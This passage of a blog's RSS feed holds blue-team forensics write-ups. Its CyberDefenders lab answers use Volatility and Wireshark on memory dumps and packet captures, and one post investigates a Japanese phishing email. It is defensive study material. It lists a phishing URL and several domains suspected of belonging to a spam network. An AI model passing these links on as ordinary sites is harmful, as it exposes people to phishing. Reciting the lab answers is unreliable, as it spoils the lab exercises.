16</h4><p>PCAP: What is the download file name the user launched the Zeus bot?</p><h4>Answer 16</h4><p>There have been a couple of suspicious files that I have found so far. One that I stumbled across earlier was bt.exe. To find it again, I just looked through the GET requests to see if the attacker had downloaded it or if I was something else.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/308/1*1MiEe7YZc_XKQA_UbS5BRw.png" /></figure><h4>Question 17</h4><p>Memory: What is the full file path of the system shell spawned through the attacker’s meterpreter session?</p><h4>Answer 17</h4><p>I much prefer using Vol3 for these types of deep dives, but I had to use Vol2 here in order to use the provided profile. Using the following command I set to look out for a shell spawn:</p><pre>python2 vol.py -f dump/webserver.vmss --profile=LinuxDFIRwebsvrx64 linux_pslist</pre><p>I found a couple of processes that match up to spawning a shell:</p><pre>0xffff880006dd8000 sh 1274 1042 33 33 0x0000000006d94000 2013-09-10 22:55:40 UTC+0000<br>0xffff88000a9b1700 sh 1275 1274 33 33 0x0000000006eb3000 2013-09-10 22:55:40 UTC+0000</pre><p>I found a command that I was a little unfamiliar with that would help me find the commands that were executed alongside this shell spawn:</p><pre>python2 vol.py -f dump/webserver.vmss --profile=LinuxDFIRwebsvrx64 linux_psaux</pre><p>Which gave me the following:</p><pre>1274   33     33     sh -c /bin/sh                                                   <br>1275   33     33     /bin/sh  </pre><p>These processes numbers match up with the ones from before, the directory in which the shell was spawned is /bin/sh.</p><h4>Question 18</h4><p>Memory: What is the Parent Process ID of the two ‘sh’ sessions?</p><h4>Answer 18</h4><p>Using the pstree linux plugin I was able to get the following:</p><pre>python2 vol.py -f dump/webserver.vmss --profile=LinuxDFIRwebsvrx64 linux_pstree | grep &#39;sh&#39; -C6<br>.mysqld              1029            115            <br>.mysqld              1030            115            <br>.mysqld              1031            115            <br>.apache2             1032                           <br>..apache2            1040            33             <br>..apache2            1042            33             <br>...sh                1274            33             <br>....sh               1275            33             <br>..apache2            1043            33             <br>..apache2            1045            33             <br>..apache2            1047            33             <br>..apache2            1267            33             <br>..apache2            1269            33             <br>..apache2            1270            33</pre><p>Looking at the tree the answer being 1042. Since both instances of sh are below it. Not 1032 because that is the parent of the 1042 process.</p><h4>Question 19</h4><p>Memory: What is the latency_record_count for PID 1274?</p><h4>Answer 19</h4><p>I got majorly stumped on this question, I had to look up some information on how to tackle this one. The definition for the latency_record_count is as follows: “A Linux kernel metric that tracks how many times a process has experienced scheduling latency beyond a certain threshold.”</p><p>This was straight up new for me, I had never dived deep into the linux kernal before when looking for artifacts so I needed to pointers.</p><p>I first used the linux_volshell plugin which loaded the following:</p><pre>python2 vol.py -f dump/webserver.vmss --profile=LinuxDFIRwebsvrx64 linux_volshell<br>Volatility Foundation Volatility Framework 2.6.1<br>Current context: process init, pid=1 DTB=0x176ba000<br>Python 2.7.18 (default, Aug  1 2022, 06:23:55) <br>Type &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.<br><br>IPython 5.10.0 -- An enhanced Interactive Python.<br>?         -&gt; Introduction and overview of IPython&#39;s features.<br>%quickref -&gt; Quick reference.<br>help      -&gt; Python&#39;s own help system.<br>object?   -&gt; Details about &#39;object&#39;, use &#39;object??&#39; for extra details.<br><br>In [1]:</pre><p>Then I had to use the following command to find the latency_record_count:</p><pre>dt(&quot;task_struct&quot;,0xffff880006dd8000)</pre><p>Giving me this:</p><pre>0x798 : dirties                        18446612132429399960<br>0x7b0 : latency_record_count           0<br>0x7b8 : latency_record                 -</pre><p>So I going to explain what I have learnt from this, firstly linux_volshell.</p><p>vol_shell is an interactive plugin that comes with volatility 2 and 3 that can dive a little deeper into specific processes and their memory locations, by opening an interactive shell to use. I have so far only used it in Vol2, I am sure it will come up when I use Vol3 more. I am not 100% sure what “dt” stands for, but for now I know I need to use it to explore more.</p><p>task_struct in the Linux kernel contains all information about a process. In this questions case, the shell/sh that the attacker opened.</p><p>I hope that enlightens things a little, I am still learning with these labs and this was a question I needed a nudge for. With the answer being 0 it meant that the attacker was not doing anything to resource intensive since shells don’t normally use too much. If they were doing something like crypto mining, there could have been a delay there.</p><h4>Question 20</h4><p>Memory: For the PID 1274, what is the first mapped file path?</p><h4>Answer 20</h4><p>This one was a little more straight forward compared to the last question for me. Using the linux_proc_maps and specifying the PID I am able to see the following:</p><pre>python2 vol.py -f dump/webserver.vmss --profile=LinuxDFIRwebsvrx64 linux_proc_maps -p 1274<br>Volatility Foundation Volatility Framework 2.6.1<br>Offset             Pid      Name                 Start              End                Flags               Pgoff Major  Minor  Inode      File Path<br>------------------ -------- -------------------- ------------------ ------------------ ------ ------------------ ------ ------ ---------- ---------<br>0xffff880006dd8000     1274 sh                   0x0000000000400000 0x0000000000418000 r-x                   0x0      8      1     651536 /bin/dash<br>0xffff880006dd8000     1274 sh                   0x0000000000617000 0x0000000000618000 r--               0x17000      8      1     651536 /bin/dash<br>0xffff880006dd8000     1274 sh                   0x0000000000618000 0x0000000000619000 rw-               0x18000      8      1     651536 /bin/dash<br>0xffff880006dd8000     1274 sh                   0x0000000000619000 0x000000000061c000 rw-                   0x0      0      0          0 <br>0xffff880006dd8000     1274 sh                   0x000000000151a000 0x000000000153b000 rw-                   0x0      0      0          0 [heap]<br>0xffff880006dd8000     1274 sh                   0x00007f878ac5f000 0x00007f878addc000 r-x                   0x0      8      1     652393 /lib/libc-2.11.1.so<br>0xffff880006dd8000     1274 sh                   0x00007f878addc000 0x00007f878afdb000 ---              0x17d000      8      1     652393 /lib/libc-2.11.1.so<br>0xffff880006dd8000     1274 sh                   0x00007f878afdb000 0x00007f878afdf000 r--              0x17c000      8      1     652393 /lib/libc-2.11.1.so<br>0xffff880006dd8000     1274 sh                   0x00007f878afdf000 0x00007f878afe0000 rw-              0x180000      8      1     652393 /lib/libc-2.11.1.so<br>0xffff880006dd8000     1274 sh                   0x00007f878afe0000 0x00007f878afe5000 rw-                   0x0      0      0          0 <br>0xffff880006dd8000     1274 sh                   0x00007f878afe5000 0x00007f878b005000 r-x                   0x0      8      1     652382 /lib/ld-2.11.1.so<br>0xffff880006dd8000     1274 sh                   0x00007f878b1f2000 0x00007f878b1f5000 rw-                   0x0      0      0          0 <br>0xffff880006dd8000     1274 sh                   0x00007f878b202000 0x00007f878b204000 rw-                   0x0      0      0          0 <br>0xffff880006dd8000     1274 sh                   0x00007f878b204000 0x00007f878b205000 r--               0x1f000      8      1     652382 /lib/ld-2.11.1.so<br>0xffff880006dd8000     1274 sh                   0x00007f878b205000 0x00007f878b206000 rw-               0x20000      8      1     652382 /lib/ld-2.11.1.so<br>0xffff880006dd8000     1274 sh                   0x00007f878b206000 0x00007f878b207000 rw-                   0x0      0      0          0 <br>0xffff880006dd8000     1274 sh                   0x00007fff5f643000 0x00007fff5f659000 rw-                   0x0      0      0          0 [stack]<br>0xffff880006dd8000     1274 sh                   0x00007fff5f7a1000 0x00007fff5f7a2000 r-x                   0x0      0      0          0 [vdso]</pre><p>The answer being at the top of the list, /bin/dash.</p><h4>Question 21</h4><p>Memory:What is the md5hash of the receive.1105.3 file out of the per-process packet queue?</p><h4>Answer 21</h4><p>Looking through the different commands I could throw at the memory dump using -h. I found that linux_pkt_queues fit the bill rather well.</p><pre>python2 vol.py -f dump/webserver.vmss --profile=LinuxDFIRwebsvrx64 -h  <br>Volatility Foundation Volatility Framework 2.6.1<br>                linux_pkt_queues        Writes per-process packet queues out to disk</pre><p>Then it was just a matter of dumping the files and using the command line to find the hash.</p><pre>python2 vol.py -f dump/webserver.vmss --profile=LinuxDFIRwebsvrx64 linux_pkt_queues -D dump/files<br>Volatility Foundation Volatility Framework 2.6.1<br>Wrote 32 bytes to receive.930.10<br>Wrote 32 bytes to receive.1105.3</pre><p>MD5 Hash:</p><pre>md5sum receive.1105.3<br>184c8748cfcfe8c0e24d7d80cac6e9bd  receive.1105.3</pre><p>I forgot to screenshot the confetti so this is the best I could do:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/446/1*bTsB1vixM5Ju-8dgh_mlcw.png" /><figcaption>Lab complete!</figcaption></figure><p>This was a little challenging towards the end, not really knowing a couple of the plugins for Volatility2. But it was a super enjoyable box.</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=a525affa61bb" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Japanese Spam Email]]></title>
            <link>https://medium.com/@JawsZero/japanese-spam-email-b02c9a5f8cdc?source=rss-2b3674ca8ff1------2</link>
            <guid isPermaLink="false">https://medium.com/p/b02c9a5f8cdc</guid>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[email-spam]]></category>
            <dc:creator><![CDATA[Jaws]]></dc:creator>
            <pubDate>Thu, 09 Apr 2026 23:34:37 GMT</pubDate>
            <atom:updated>2026-04-09T23:34:37.359Z</atom:updated>
            <content:encoded><![CDATA[<h4>For some reason I got a Japanese spam email.</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/673/1*bw50cKC6QRJfQy21bOBO9Q.png" /></figure><p>I have a small fancination with spam emails, so I took a little bit of a deeper dive into this one. I first ran my .eml parser tool on the email file and got the following:</p><pre>└─$ ./eml_parser -f 1.eml     <br><br>___________              .__.__    __________                                   <br>\_   _____/ _____ _____  |__|  |   \______   \_____ _______  ______ ___________ <br> |    __)_ /     \\__  \ |  |  |    |     ___/\__  \\_  __ \/  ___// __ \_  __ \<br> |        \  Y Y  \/ __ \|  |  |__  |    |     / __ \|  | \/\___ \\  ___/|  | \/<br>/_______  /__|_|  (____  /__|____/  |____|    (____  /__|  /____  &gt;\___  &gt;__|   <br>        \/      \/     \/                          \/           \/     \/       <br>        <br>Make sure to manually check the file for residual artifacts<br><br>File Name: 1.eml<br>Received SPF: Pass (protection.outlook.com: domain of em4284.thethriftygroove.com designates 149.72.70.15 as permitted sender) receiver=protection.outlook.com; client-ip=149.72.70.15; helo=s.wrqvqshf.outbound-mail.sendgrid.net; pr=C<br>SPF Passed: true<br>DKIM Result: pass<br>Return Path:  bounces+54236783-7f2f-my=email@em4284.thethriftygroove.com<br>From: サインイン通知 &lt;ui@thethriftygroove.com&gt;<br>To: &quot;email&quot; &lt;email&gt;<br>Reply-To: N/A<br>Subject:  【Amazon.co.jp】新しいデバイスからのサインインがありました<br><br>Links:<br><br>  - https://soutien-nicolas.com/security/information<br><br>Emails Found in Body:<br><br></pre><p>The body of the email of course is in Japanese. Which I couldn’t read, so I used Papago to translate it. Turns out its a classic “We have detected a new sign in from X location”.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*tPrzzEn_HK0Mgdpk--Jq7Q.png" /></figure><p>Time to look into the URLs and IP addresses that are associated with the email.</p><pre>xzznhznor.nl (Originating URL, according to PhishTool)<br>soutien-nicolas.com (in body of email)<br>thethriftygroove.com (DKIM Signature email and return email)<br>231.75.66.8 (IP Address in the email body)<br>149.72.70.15 (IP Address from the SPF record)</pre><p>The first URL on that list seems to have been a straight spoof. Nothing comes up. The second one was a little more interesting. I first searched it via URL Scanner and it goes to a very basic landing page, which is based in Tokyo Japan.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/814/1*INNLcq5skgmIjHpObLlruA.png" /></figure><p>I have never thought about doing this before, but I decided to check the internet archive to see if there was any information or snapshots of the site prior to its use in spam emails.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*gz9wbRIVXu4Ok20rWiZkUA.png" /></figure><p>Looks like there are quite a few captures of this URL. Checking 2026 and 2025, interestingly these captures have nothing on the page but have Chinese titles.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/724/1*-_wf73TiyMgFnMgE0ENxBA.png" /></figure><pre>“乐动在线平台-乐动”<br><br>“Ledong Online Platform – Ledong”</pre><p>This is the only translation I could gleam from the text. So at some point someone registered it from China and set up a front? I then went to the earliest archive of the website. 20/06/2013.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pp6GL3j9l5YgHP6Q3p3rCw.png" /></figure><p>Okay, so the website is just a name and the website was originally set up as a petition? Translating the text gives me the following:</p><blockquote>Nicolas, a young opponent of the Taubira Act, was sentenced to two months’ imprisonment and a fine of 1,000€ for “rebellion” which his lawyer disputes, video supporting. On 16 June 2013, during a peaceful demonstration, he had been charged violently, without warning of use by law enforcement and then arrested in a private place without an initial offence.<br>He is charged with two other charges: “misleading identity” because he gave his mother’s last name and refused to engage in a DNA swab.<br>He was immediately collapsed in Fleury-Mérogis prison.</blockquote><p>Alright then. So this was the original reason for this websites creation. Apparently he was also freed?</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/823/1*hTGxAullOPgrcL22FQybZA.png" /></figure><p>This is a capture from 2014 with the title: <em>Judgment on appeal: Nicolas is free!</em></p><p>So since this whole issue with Nicolas had resolved the domain was left to expire on 6th September 2018. But it was then quickly registered to someone in Indonesia in 2019.</p><p>It then seemingly became an article spam website.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*aCkXnQ0q3C1ZDz2twTeTJA.png" /></figure><p>Just hundreds of random articles about anything from food to insurance. Which then expired a couple of years later and went on sale. This leads us up to the most recent domain registration. 30th April 2025.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/800/1*Ngx1771gfUPEk1sR6Q3pnQ.png" /></figure><p>It expires at the end of this month, so I will be checking back to see if its been renewed.</p><p>Now comes the fun part, loading the webpage in a sandbox:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1021/1*gyLJxVZK9FoDEiXtiND82g.png" /></figure><p>This is the current landing page of the original URL. It redirects to another website that is hosted in Brazil. And so the rabbit hole goes deeper. I am going to skip to the chase a little here. So the website itself, in its early years, was a redirect. Belle Vue makeup -&gt; East Side makeup.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*G177qitOS6CUFLpd39XBSQ.png" /></figure><p>Above is a capture from 2023, although the website looks like its not been used since 2015 going by the copyright mark at the bottom of the page. Although that could be very unreliable. Now to its most recent archive:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*RbKOlQeNNwJvRMBfGUVjtA.png" /><figcaption>19th July 2025</figcaption></figure><p>Translation of the top text (via papago):</p><blockquote>Official website for online viewing and download of tough guy videos_ Free online viewing of tough guy videos_ Download the tough guy video app_ Download tough guy videos</blockquote><p>This could very well be something else…the translation might not be perfect. Most of the links in the archived version don’t work. Apart from the ones at the very bottom. All of them linking to other RANDOM websites that have the same layout. These could very well be part of the spam network. Although I am unable to confirm since I only have this one URL from the email I got.</p><pre>http://southernstarmedical.com/<br>http://m.sw3yj.com/<br>http://gamdomrain.com/<br>http://m.qidgj.com/<br>http://m.hnqcyw.com/<br>http://bancosantandercentral.com/<br>http://m.xiaoguzhubao.com/<br>http://sheblogsaboutjobs.com/<br>http://fengyansb.cn/<br>http://tantanautomation.com/</pre><p>Most of these website have the same footer, with different links to different websites:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*z9_D0PPzucYmNQ0sufQozg.png" /></figure><p>One of them even linked to the following:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/712/1*GYSeTYUwHBnMpB1LfsoKkw.png" /><figcaption>24th October 2023 archive</figcaption></figure><p>It does look like the website is not defunct thankfully. Although its still possible its infected with some sort of malware and might even try and drop malware on your system if you aren’t running up to date browser software. This, I can’t confirm. What I do believe is happening is a random group of spammers buy up old domains that had previously been used for some random purpose, then repurpose them into landing pages for links that are in spam emails.</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=b02c9a5f8cdc" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[PacketMaze Lab Writeup]]></title>
            <link>https://medium.com/@JawsZero/packetmaze-lab-writeup-d7ed443ac434?source=rss-2b3674ca8ff1------2</link>
            <guid isPermaLink="false">https://medium.com/p/d7ed443ac434</guid>
            <category><![CDATA[wireshark]]></category>
            <category><![CDATA[soc-analyst]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[blue-team]]></category>
            <category><![CDATA[cyberdefender]]></category>
            <dc:creator><![CDATA[Jaws]]></dc:creator>
            <pubDate>Tue, 18 Nov 2025 17:56:41 GMT</pubDate>
            <atom:updated>2025-11-18T17:56:41.912Z</atom:updated>
            <content:encoded><![CDATA[<h4>CyberDefenders Network Forensics Lab</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/946/1*TeFhQJ7tCHPNZVhlQWEfLg.png" /></figure><h4>Scenario</h4><p>A company’s internal server has been flagged for unusual network activity, with multiple outbound connections to an unknown external IP. Initial analysis suggests possible data exfiltration. Investigate the provided network logs to determine the source and method of compromise.</p><h4>Question 1</h4><p>What is the FTP password?</p><h4>Answer 1</h4><p>Filtering the packets by FTP showed a login processes revealing a plaintext password:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*75MJ9XUcbmxYosBoxrLHBQ.png" /></figure><h4>Question 2</h4><p>What is the IPv6 address of the DNS server used by 192.168.1.26?</p><h4>Answer 2</h4><p>Originally I read the question as, finding the IPv6 address of 192.168.1.26, but its finding the DNS in which that IP address uses. Which made more sense, always double check the question.</p><p>Locating the MAC address of the DNS server was key here, so I filtered for DNS requests. Then located a conversation between 192.168.1.26 with a DNS server, which turned out to be 192.168.1.10. Then it was a simple cross referencing the MAC address to the IP that ends in 10, with the IPv6 conversations.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/702/1*XoBwHEgdJ5w-GagXNTY6AQ.png" /></figure><p>Giving me:</p><pre>fe80::c80b:adff:feaa:1db7</pre><h4>Question 3</h4><p>What domain is the user looking up in packet 15174?</p><h4>Answer 3</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/590/1*z5Gf_GKpG4Rca9DTCoA-Dg.png" /></figure><p>No need for an explanation here, just navigating to the packet and reading the data.</p><h4>Question 4</h4><p>How many UDP packets were sent from 192.168.1.26 to 24.39.217.246?</p><h4>Answer 4</h4><p>The Conversations tool in Wireshark is perfect for this question.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/669/1*_Wp9l9KVnF_rQoxb4ONbmg.png" /></figure><p>10 total packets sent.</p><h4>Question 5</h4><p>What is the MAC address of the system under investigation in the PCAP file?</p><h4>Answer 5</h4><p>In a previous question we are asked about the host machine contacting a DNS server. So finding the MAC address of the IPv4 192.168.1.26 was as easy as finding a single packet.</p><pre>c8:09:a8:57:47:93</pre><h4>Question 6</h4><p>What was the camera model name used to take picture 20210429_152157.jpg?</p><h4>Answer 6</h4><p>I first looked into any HTTP requests that might have downloaded an image, with no luck. Then I looked into FTP requests, finding 2 image files. A quick File -&gt; Export -&gt; FTP gave me the file to work with.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/738/1*oFtcTfLclxEiYwW_AyUcLA.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/535/1*nCWjgXwXgkd0yoci_SVQUA.png" /></figure><h4>Question 7</h4><p>What is the ephemeral public key provided by the server during the TLS handshake in the session with the session ID: da4a0000342e4b73459d7360b4bea971cc303ac18d29b99067e46d16cc07f4ff?</p><h4>Answer 7</h4><p>I searched the above string with CRTL+F, making sure to specify packet details and string.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/929/1*iHqrSe9WQ2mU6AQhxbQY8A.png" /></figure><p>Leading me to packet number, 26913. Which held the public key, as seen in the image above.</p><h4>Question 8</h4><p>What is the first TLS 1.3 client random that was used to establish a connection with protonmail.com?</p><h4>Answer 8</h4><p>Specifying TLSv1.3 in the filter section then looking for the string “protonmail” led me to packet number, 17992. Which in turn gave me the random.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/849/1*f16e0gFBd84OoCgnCJcJNw.png" /></figure><h4>Question 9</h4><p>Which country is the manufacturer of the FTP server’s MAC address registered in?</p><h4>Answer 9</h4><p>Knowing from a previous question what the IP address of the FTP server was, gave me the MAC address. Then I just searched it on a MAC address look up website to find the answer:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/987/1*dXZaNbHq3i-Gd4knlrzjSA.png" /></figure><h4>Question 10</h4><p>What time was a non-standard folder created on the FTP server on the 20th of April?</p><h4>Answer 10</h4><p>This one I got a little stuck on, but I just had to filter for both FTP and FTP-DATA in order to find the answer. Filtering for FTP didn’t lead to much of anything, just a lot of FTP commands that were thrown around.</p><p>After filtering FTP-DATA I managed to find a ton more information. Then I just used Follow -&gt; TCP Stream on the first result to find the following:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/948/1*E4kQ6dj1idb9oUkvSIkH-Q.png" /></figure><p>Most of those directories are used in Linux, however a folder name ftp is not standard. Which here is the answer.</p><h4>Question 11</h4><p>What URL was visited by the user and connected to the IP address 104.21.89.171?</p><h4>Answer 11</h4><p>Filtering the above IP address and looking for a Client Hello packet was enough to lead me to the answer:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*OyrbIMm3UXnkLx_RGUi7tw.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/487/1*OFgjys1-FBCtoo_IASwrbg.png" /><figcaption>Lab Complete!</figcaption></figure><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=d7ed443ac434" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[LGDroid Lab Writeup]]></title>
            <link>https://medium.com/@JawsZero/lgdroid-lab-writeup-fac807e1b648?source=rss-2b3674ca8ff1------2</link>
            <guid isPermaLink="false">https://medium.com/p/fac807e1b648</guid>
            <category><![CDATA[blue-team]]></category>
            <category><![CDATA[endpoint-forensics]]></category>
            <category><![CDATA[soc-analyst]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[cyberdefender]]></category>
            <dc:creator><![CDATA[Jaws]]></dc:creator>
            <pubDate>Mon, 17 Nov 2025 20:24:49 GMT</pubDate>
            <atom:updated>2025-11-17T20:24:49.123Z</atom:updated>
            <content:encoded><![CDATA[<h4>CyberDefenders Endpoint Forensics</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/996/1*N6pasRlTB1Xv3EVxbLXzZA.png" /></figure><h4>Scenario</h4><p>On May 21, 2021, an intelligence agency intercepted a mobile device suspected of covert operations. The forensic team performed a full disk dump, extracting databases, logs, and application activity. Findings suggest encrypted communications, anonymous browsing, and unauthorized data transfers. Analyze extracted data to determine suspect activities, network connections, and security risks while establishing a timeline of events.</p><h4>Question 1</h4><p>What is the email address of Zoe Washburne?</p><h4>Answer 1</h4><p>The first place I would normally check would be contacts. Most phones have a user contact which stores a lot of information about the user of the phone. So opening up contacts3.db, I was able to find the email address along with more information that might be valuable later on.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*3RjtivKpUNgqrKJ4fo8AVA.png" /></figure><h4>Question 2</h4><p>What was the device’s DateTime in UTC at the time of acquisition?</p><h4>Answer 2</h4><p>Looking through some of the provided files, a Live Data folder seemed most interesting. Inside there happened to be a .txt file that contained the date and time in which the capture was taken.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/317/1*dER3lxOFErlf2ubwIRrPzQ.png" /></figure><h4>Question 3</h4><p>What time was the Tor Browser downloaded in UTC?</p><h4>Answer 3</h4><p>Within the same folder as the contacts datebase there happened to be a download.db file. A quick look over said file led me to find the exact timestamp in which the Tor Browser was download. I then had to convert it using a free online conversion tool.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/912/1*0Vkeg17d-xIyHcstCzDyig.png" /></figure><h4>Question 4</h4><p>At what time did the phone reach a 100% charge after the last reset?</p><h4>Answer 4</h4><p>Looking through the Dumpsys folder, I found a couple of .txt files that were battery related. The one named batterystats.txt was the most useful. Looking at the first few lines of the file I could see that the reset time was:</p><pre>Battery History (0% used, 908 used of 512KB, 17 strings using 1928):<br>                    0 (10) RESET:TIME: 2021-05-21-13-12-19</pre><p>The scrolling down I found the point in which it reached 100% after being plugged in.</p><pre>          +4m03s318ms (2) 099 temp=295 volt=4373<br>          +4m27s915ms (2) 099 brightness=bright<br>          +4m52s141ms (2) 099 brightness=dark<br>          +5m01s459ms (3) 100 status=full charge=2665</pre><p>5 minutes and 1 second after the reset. So some simple addition of the time at restart and 5 mins and 1 second gave me the answer.</p><h4>Question 5</h4><p>What is the password for the most recently connected WIFI access point?</p><h4>Answer 5</h4><p>This one was a little tricky. All the files that had WiFi in the name didn’t have any indication as to the password of the various networks that the user had come into contact/connected to. Each one saying &lt;removed&gt;.</p><p>So looking deeper in to the file system, I found a folder called com.android.providers.settings. Which gave me the following WiFi password:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/572/1*VtWki7hNRoYu7fXm0pn0_g.png" /></figure><h4>Question 6</h4><p>What app was the user focused on at 2021–05–20 14:13:27?</p><h4>Answer 6</h4><p>A handy file named usage_stats.txt gave me a full timeline of what app was accessed by the user and when.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1011/1*nE5EwLWdwnxwe7WKV6MzYw.png" /></figure><p>Giving me a clear answer, YouTube.</p><h4>Question 7</h4><p>How long did the suspect watch YouTube on 2021–05–20?</p><h4>Answer 7</h4><p>Looking at the same file, you are able to tell where the app is being used on the screen. Either the foreground or the background. The user started to watch YouTube at 14:13:27 and moved it to the background at 22:47:57.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/549/1*46X7lEIfbrzVu1apWKYbBw.png" /><figcaption>MOVE_TO_FOREGROUND</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/581/1*IeIGwpvO23LWbH4RJeeR_A.png" /><figcaption>MOVE_TO_BACKGROUND</figcaption></figure><p>8 Hours and 34 Minutes.</p><h4>Question 8</h4><p>What is the structural similarity metric for the image “suspicious.jpg” compared to a visually similar image taken with a mobile phone?</p><h4>Answer 8</h4><p>Using <a href="https://darosh.github.io/image-ssim-js/test/browser_test.html">this</a> website, I am able to tell how similar the images are.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/400/1*LGfmv9DeD8E4cuM7UfyoHQ.png" /></figure><p>The one taken by the user was stored in the DCIM folder on both the SD card and the main android file system.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/474/1*trUlO0g526ymEaevtXWHGw.png" /><figcaption>Lab Complete!</figcaption></figure><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=fac807e1b648" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[MrRobot Lab Writeup]]></title>
            <link>https://medium.com/@JawsZero/mrrobot-lab-writeup-a0a33d877fc7?source=rss-2b3674ca8ff1------2</link>
            <guid isPermaLink="false">https://medium.com/p/a0a33d877fc7</guid>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[cyberdefender]]></category>
            <category><![CDATA[soc-analyst]]></category>
            <category><![CDATA[blue-team]]></category>
            <category><![CDATA[digital-forensics]]></category>
            <dc:creator><![CDATA[Jaws]]></dc:creator>
            <pubDate>Thu, 06 Nov 2025 16:24:16 GMT</pubDate>
            <atom:updated>2025-11-06T16:24:16.969Z</atom:updated>
            <content:encoded><![CDATA[<h4>CyberDefenders Endpoint Forensics Lab</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/976/1*lSRKmK19xGD82Xi2FmbD8A.png" /></figure><h4>Scenario</h4><p>An employee reported that his machine started to act strangely after receiving a suspicious email for a security update. The incident response team captured a couple of memory dumps from the suspected machines for further inspection. Analyze the dumps and help the SOC analysts team figure out what happened!</p><h4>Question 1</h4><p>Machine:Target1 What email address tricked the front desk employee into installing a security update?</p><h4>Answer 1</h4><p>Despite the tools listed stating that you can use Volatility3, that doesn’t seem to be the case. I couldn’t find a good answer as to why, I think I need to make another profile in order to detect the kernel version. So I will be using Volatility2 for this lab.</p><p>First I need to run the imageinfo command to find out what profile I need to be using:</p><pre>└─$ python2 vol.py -f dump/target1.vmss imageinfo <br>INFO    : volatility.debug    : Determining profile based on KDBG search...<br>          Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000, Win7SP1x86<br>                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)<br>                     AS Layer2 : VMWareAddressSpace (Unnamed AS)<br>                     AS Layer3 : FileAddressSpace (/home/zero/Documents/volatility2/dump/target1.vmss)<br>                      PAE type : PAE<br>                           DTB : 0x185000L<br>                          KDBG : 0x82765be8L<br>          Number of Processors : 2<br>     Image Type (Service Pack) : 0<br>                KPCR for CPU 0 : 0x82766c00L<br>                KPCR for CPU 1 : 0x807c5000L<br>             KUSER_SHARED_DATA : 0xffdf0000L<br>           Image date and time : 2015-10-09 12:53:02 UTC+0000<br>     Image local date and time : 2015-10-09 08:53:02 -0400</pre><p>Using one of the suggested profiles, I then looked for any email clients that are running on the system.</p><pre>$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 pslist<br>Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit                          <br>---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------<br>0x85d0d030 iexplore.exe           2996   2984      6      463      1      0 2015-10-09 11:31:27 UTC+0000                                 <br>0x85cd3d40 OUTLOOK.EXE            3196   2116     22     1678      1      0 2015-10-09 11:31:32 UTC+0000                                 <br>0x85d01510 svchost.exe            3232    528      9      131      0      0 2015-10-09 11:31:34 UTC+0000</pre><p>I next dumps the files that are associated with OUTLOOK.exe.</p><pre>$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 dumpfiles -p 3196 --dump-dir dump/files</pre><p>There was one file that was pulled that caught my interest:</p><pre>0x83e61be0   3196   \Device\HarddiskVolume2\Users\frontdesk\AppData\Local\Microsoft\Outlook\Frontdesk@allsafecybersec.com - outlook2.ost</pre><p>This gave me the email address of the person that received the malicious email, along with a file that might contain data pertaining to the sender. Sadly this didn’t work out, so next I tried using memdump to gather the process memory at time of capture. Then after which I used strings to grab any potential email address.</p><pre>$ 